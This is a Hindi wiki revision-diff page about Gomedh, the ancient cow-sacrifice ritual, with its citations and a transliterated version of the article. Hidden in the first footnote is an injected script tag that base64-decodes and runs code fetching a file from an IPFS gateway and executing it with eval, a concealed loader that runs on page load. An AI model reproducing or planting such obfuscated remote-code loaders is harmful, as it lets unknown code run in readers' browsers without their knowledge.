Difference between revisions of "गोमेध"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "khoj.bharatdiscovery.org" to "bharatkhoj.org")
 
Line 3: Line 3:
 
*[[श्राद्ध]] में भी गौवध का प्रसंग है। शूलगव में भी वृषवध उल्लिखित हुआ है।<ref>हिस्ट्री ऑव धर्मशास्त्र, भाग 2, पृ.831-532</ref>बाद में ये कर्म कलिवर्ज्य मान लिए गए।<ref>हिस्ट्री ऑव धर्मशास्त्र, भाग 3, पृ. 939-940</ref>
 
*[[श्राद्ध]] में भी गौवध का प्रसंग है। शूलगव में भी वृषवध उल्लिखित हुआ है।<ref>हिस्ट्री ऑव धर्मशास्त्र, भाग 2, पृ.831-532</ref>बाद में ये कर्म कलिवर्ज्य मान लिए गए।<ref>हिस्ट्री ऑव धर्मशास्त्र, भाग 3, पृ. 939-940</ref>
 
*'गोमेध' या 'गोसव' के विशिष्ट विवरण अनेकत्र हैं, जिससे यह निश्चित होता है कि प्राचीन काल में [[यज्ञ]] में गौवध वैध रूप से किया जाता था। बाद में हानि देखकर क्रमश: यह प्रथा त्याज्य हो गई।
 
*'गोमेध' या 'गोसव' के विशिष्ट विवरण अनेकत्र हैं, जिससे यह निश्चित होता है कि प्राचीन काल में [[यज्ञ]] में गौवध वैध रूप से किया जाता था। बाद में हानि देखकर क्रमश: यह प्रथा त्याज्य हो गई।
*'[[चरकसंहिता]]' सदृश प्रामाणिक [[ग्रंथ]] में यज्ञीय गौवध पर कहा गया है कि- "पृष्घ्रा ने पहले गौवध किया था"।<ref>{{cite web |url=http://khoj.bharatdiscovery.org/india/%E0%A4%97%E0%A5%8B%E0%A4%AE%E0%A5%87%E0%A4%A7|title=गोमेध|accessmonthday=26 फ़रवरी|accessyear=2014|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
*'[[चरकसंहिता]]' सदृश प्रामाणिक [[ग्रंथ]] में यज्ञीय गौवध पर कहा गया है कि- "पृष्घ्रा ने पहले गौवध किया था"।<ref>{{cite web |url=http://bharatkhoj.org/india/%E0%A4%97%E0%A5%8B%E0%A4%AE%E0%A5%87%E0%A4%A7|title=गोमेध|accessmonthday=26 फ़रवरी|accessyear=2014|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
*गोमेध और पशु यज्ञसंबंधी विशिष्ट तथ्य इतिहास तथा पुराणों में हैं और पूर्वव्याख्याकारों ने उसे 'गौपशु' का साक्षात्‌ वध ही माना है।
 
*गोमेध और पशु यज्ञसंबंधी विशिष्ट तथ्य इतिहास तथा पुराणों में हैं और पूर्वव्याख्याकारों ने उसे 'गौपशु' का साक्षात्‌ वध ही माना है।
 
*एक गोसव नामक एकाह सोमयज्ञ है।<ref>[[तैत्तिरीय ब्राह्मण]] 2/7/6 </ref>इस [[यज्ञ]] का विचित्र वर्णन है। वत्सर पर्यंत इस कर्म को करने वाला पशुव्रत पदवाच्य होता है।<ref>[[आश्वलायन श्रौतसूत्र]]</ref>गोसव संबंधी विवरण 'यज्ञतत्वप्रकाश' में द्रष्टव्य है।<ref>यज्ञतत्वप्रकाश, पृ. 124</ref>
 
*एक गोसव नामक एकाह सोमयज्ञ है।<ref>[[तैत्तिरीय ब्राह्मण]] 2/7/6 </ref>इस [[यज्ञ]] का विचित्र वर्णन है। वत्सर पर्यंत इस कर्म को करने वाला पशुव्रत पदवाच्य होता है।<ref>[[आश्वलायन श्रौतसूत्र]]</ref>गोसव संबंधी विवरण 'यज्ञतत्वप्रकाश' में द्रष्टव्य है।<ref>यज्ञतत्वप्रकाश, पृ. 124</ref>

Latest revision as of 12:24, 25 October 2017

gomedh ek vishesh prakar ka yajn hai. is yajn mean gau (gay) ka alanbhan[1] kiya jata hai, at: isake liye 'gavalanbh' shabd bhi prayukt hota hai. pahale anek avasaroan par 'go' ya 'vrish' ka vadh kiya jata tha.[2] madhupark mean gauvadh bhi bahudha kaha gaya hai.[3]

  • shraddh mean bhi gauvadh ka prasang hai. shoolagav mean bhi vrishavadh ullikhit hua hai.[4]bad mean ye karm kalivarjy man lie ge.[5]
  • 'gomedh' ya 'gosav' ke vishisht vivaran anekatr haian, jisase yah nishchit hota hai ki prachin kal mean yajn mean gauvadh vaidh roop se kiya jata tha. bad mean hani dekhakar kramash: yah pratha tyajy ho gee.
  • 'charakasanhita' sadrish pramanik granth mean yajniy gauvadh par kaha gaya hai ki- "prishghra ne pahale gauvadh kiya tha".[6]
  • gomedh aur pashu yajnasanbandhi vishisht tathy itihas tatha puranoan mean haian aur poorvavyakhyakaroan ne use 'gaupashu' ka sakshath‌ vadh hi mana hai.
  • ek gosav namak ekah somayajn hai.[7]is yajn ka vichitr varnan hai. vatsar paryant is karm ko karane vala pashuvrat padavachy hota hai.[8]gosav sanbandhi vivaran 'yajnatatvaprakash' mean drashtavy hai.[9]


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. vadh, hiansa, hatya
  2. histri aauv dharmashastr, bhag 2, pri. 627
  3. histri aauv dharmashastr, bhag 2, pri. 543-545
  4. histri aauv dharmashastr, bhag 2, pri.831-532
  5. histri aauv dharmashastr, bhag 3, pri. 939-940
  6. gomedh (hindi). . abhigaman tithi: 26 faravari, 2014.
  7. taittiriy brahman 2/7/6
  8. ashvalayan shrautasootr
  9. yajnatatvaprakash, pri. 124

sanbandhit lekh